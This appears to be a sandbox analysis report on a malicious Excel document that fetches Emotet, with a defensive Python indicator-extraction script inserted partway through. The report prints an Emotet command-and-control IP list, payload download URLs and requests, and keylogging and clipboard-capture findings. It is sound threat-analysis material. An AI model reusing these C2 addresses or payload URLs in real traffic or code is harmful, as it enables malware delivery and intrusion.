Windows Analysis Report
DETAILS-145.xls

Overview

General Information

Sample Name: DETAILS-145.xls
Analysis ID: 562407
MD5: c15231bf03d2cde2f5d16665421d03a1
SHA1: e552fc97c08d64ac0d17c4cebf428665982600ed
SHA256: 107833427623de2638b3514e51ac1241be3911cccc699e8603c7146755356bd9
Tags: SilentBuilderxls

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection

Source: 19.2.rundll32.exe.180000.0.raw.unpack Malware Configuration Extractor: Emotet {"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}
Source: DETAILS-145.xls ReversingLabs: Detection: 34%
Source: C:\ProgramData\QWER.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.168:80
Source: global traffic DNS query: name: kuyporn.com

Networking

Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.168:80
Source: global traffic HTTP traffic detected: GET /qqw/aas/se.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/XSs5/ HTTP/1.1Host: kuyporn.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/vzOG/ HTTP/1.1Host: jeffreylubin.igclout.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-msdownloadContent-Length: 557056Connection: keep-aliveKeep-Alive: timeout=15Date: Fri, 28 Jan 2022 20:08:01 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Fri, 28 Jan 2022 20:08:01 GMTContent-Disposition: attachment; filename="v3Q.dll"Content-Transfer-Encoding: binarySet-Cookie: 61f44d2196a27=1643400481; expires=Fri, 28-Jan-2022 20:09:01 GMT; Max-Age=60; path=/Last-Modified: Fri, 28 Jan 2022 20:08:01 GMTX-Frame-Options: SAMEORIGIN
Source: global traffic HTTP traffic detected: GET /qqw/aas/se.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
Source: Joe Sandbox View ASN Name: AS-CHOOPAUS
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View IP Address: 207.148.81.119
Source: Joe Sandbox View IP Address: 104.131.62.48
Source: unknown Network traffic detected: IP country count 15
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htm
Source: unknown DNS traffic detected: queries for: kuyporn.com
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv, 9_2_10012C30
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: mshta.exe, 00000004.00000003.430703152.000000000031C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454494947.000000000031C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000003.430703152.000000000031C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454494947.000000000031C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
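The network records above are the part of this report an analyst turns into indicators first: two hosts reached by name, one reached by a literal IP that never appears in a DNS query, and a first-stage download (se.html, se.png) carrying the legacy IE7-compatible User-Agent. The script below is an added example, not part of the sandbox output: it parses constructed copies of the report lines (the report runs HTTP headers together with no separator, so each header is cut out by looking ahead for the next one), returns the requests and DNS facts as data, and flags URLs whose host is a hard-coded IP or was never resolved in the supplied lines. The sample lines are reproduced from this page; no other input is assumed.

```python
"""Pull network IOCs out of sandbox 'HTTP traffic detected' / 'DNS traffic detected'
lines and flag destinations reached by literal IP with no DNS lookup.
Added example; SAMPLE_LINES are constructed copies of records in this report."""
import ipaddress
import re
from collections import Counter

SAMPLE_LINES = [
    "Source: unknown DNS traffic detected: queries for: kuyporn.com",
    "Source: global traffic HTTP traffic detected: GET /qqw/aas/se.html HTTP/1.1"
    "Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflate"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; "
    ".NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; "
    ".NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive",
    "Source: global traffic HTTP traffic detected: GET /qqw/aas/se.png HTTP/1.1"
    "Host: 91.240.118.168Connection: Keep-Alive",
    "Source: global traffic HTTP traffic detected: GET /wp-content/XSs5/ HTTP/1.1"
    "Host: kuyporn.comConnection: Keep-Alive",
    "Source: global traffic HTTP traffic detected: GET /wp-admin/vzOG/ HTTP/1.1"
    "Host: jeffreylubin.igclout.comConnection: Keep-Alive",
] + ["Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168"] * 19

# The report prints HTTP headers back to back with no separator, so each field is
# cut out with a lookahead for the header that follows it (or whitespace / end of
# line, which also handles requests that were printed one header per line).
HTTP_RE = re.compile(r"HTTP traffic detected: (?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]")
HOST_RE = re.compile(r"Host:\s*(?P<host>\S+?)(?=Connection:|\s|$)")
UA_RE = re.compile(r"User-Agent:\s*(?P<ua>.+?)(?=Host:|\s*$)")
DNS_RE = re.compile(r"DNS traffic detected: queries for: (?P<name>\S+)")
NODNS_RE = re.compile(r"without corresponding DNS query: (?P<ip>\S+)")


def is_ip(host: str) -> bool:
    """True when the Host header is a literal IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def extract_iocs(lines):
    """Return HTTP requests, names seen in DNS, and a count of no-DNS connections per IP."""
    requests, resolved, no_dns = [], set(), Counter()
    for line in lines:
        m = HTTP_RE.search(line)
        if m:
            host_m, ua_m = HOST_RE.search(line), UA_RE.search(line)
            host = host_m.group("host") if host_m else ""
            requests.append({
                "method": m.group("method"),
                "host": host,
                "path": m.group("path"),
                "url": f"http://{host}{m.group('path')}",
                "user_agent": ua_m.group("ua") if ua_m else None,
                "host_is_ip": bool(host) and is_ip(host),
            })
            continue
        m = DNS_RE.search(line)
        if m:
            resolved.add(m.group("name"))
            continue
        m = NODNS_RE.search(line)
        if m:
            no_dns[m.group("ip")] += 1
    return {"requests": requests, "resolved": resolved, "no_dns": no_dns}


def triage(iocs):
    """Findings worth a block: hard-coded C2 IPs and hosts contacted without a DNS lookup."""
    findings = []
    for r in iocs["requests"]:
        if r["host_is_ip"] and r["host"] in iocs["no_dns"]:
            findings.append(f"{r['url']} (hard-coded IP, "
                            f"{iocs['no_dns'][r['host']]} connections without DNS)")
        elif not r["host_is_ip"] and r["host"] not in iocs["resolved"]:
            findings.append(f"{r['url']} (no DNS query for this host in the supplied lines)")
    return findings


if __name__ == "__main__":
    for finding in triage(extract_iocs(SAMPLE_LINES)):
        print(finding)
```

Run as is, it reports the two se.html/se.png fetches from 91.240.118.168 as hard-coded-IP traffic with 19 DNS-less connections, and notes that jeffreylubin.igclout.com has no DNS query among the records shown. Feed it the raw report instead of SAMPLE_LINES to get the same structure for another sample.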

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 9_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 11_2_1001B43F
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud

barindex
Source: Yara match File source: 17.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2810000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f40000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2380000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2380000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ed0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.25f0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2320000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23e0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.910000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e80000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a40000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2f30000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a70000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.5f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2670000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2860000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.25c0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2590000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.25f0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2410000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f40000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.7a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.24d0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a60000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2350000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.28e0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26b0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2280000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e50000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3d0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ed0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.820000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e20000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.31d0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.8a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2fd0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ae0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.23d0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.910000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2960000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2250000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2eb0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2730000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3170000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a40000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.170000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.23d0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2350000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.7a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ae0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.370000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a60000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2f30000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.27a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2960000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23e0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.28e0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.370000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2590000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.22b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.22b0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.910000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.27a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e50000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.10000000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.574709897.0000000000230000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522412460.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.574966326.0000000000911000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.521968966.0000000000400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575355954.00000000024D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.682108397.0000000000231000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522161075.0000000002381000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522361954.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522256343.0000000002731000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673081131.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616094913.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.577991543.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522563448.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522208158.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575698621.0000000002671000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675215228.0000000002E21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675330890.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.677230667.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522291162.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575069937.0000000002281000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575241988.0000000002381000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575278324.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.678452410.0000000000241000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.524549461.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673490791.0000000002251000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616750004.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616484887.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.687313669.0000000010001000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616301764.00000000008A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673601215.0000000002811000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675278836.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616955117.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673042649.0000000000220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.577507576.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616430850.0000000000A71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616392195.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.521709838.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.615957746.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.521942436.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.678978438.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.678388304.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673313788.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.521853368.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616649136.0000000002590000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.618439586.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575484750.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575139258.0000000002321000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675083188.0000000002960000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575185069.0000000002350000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
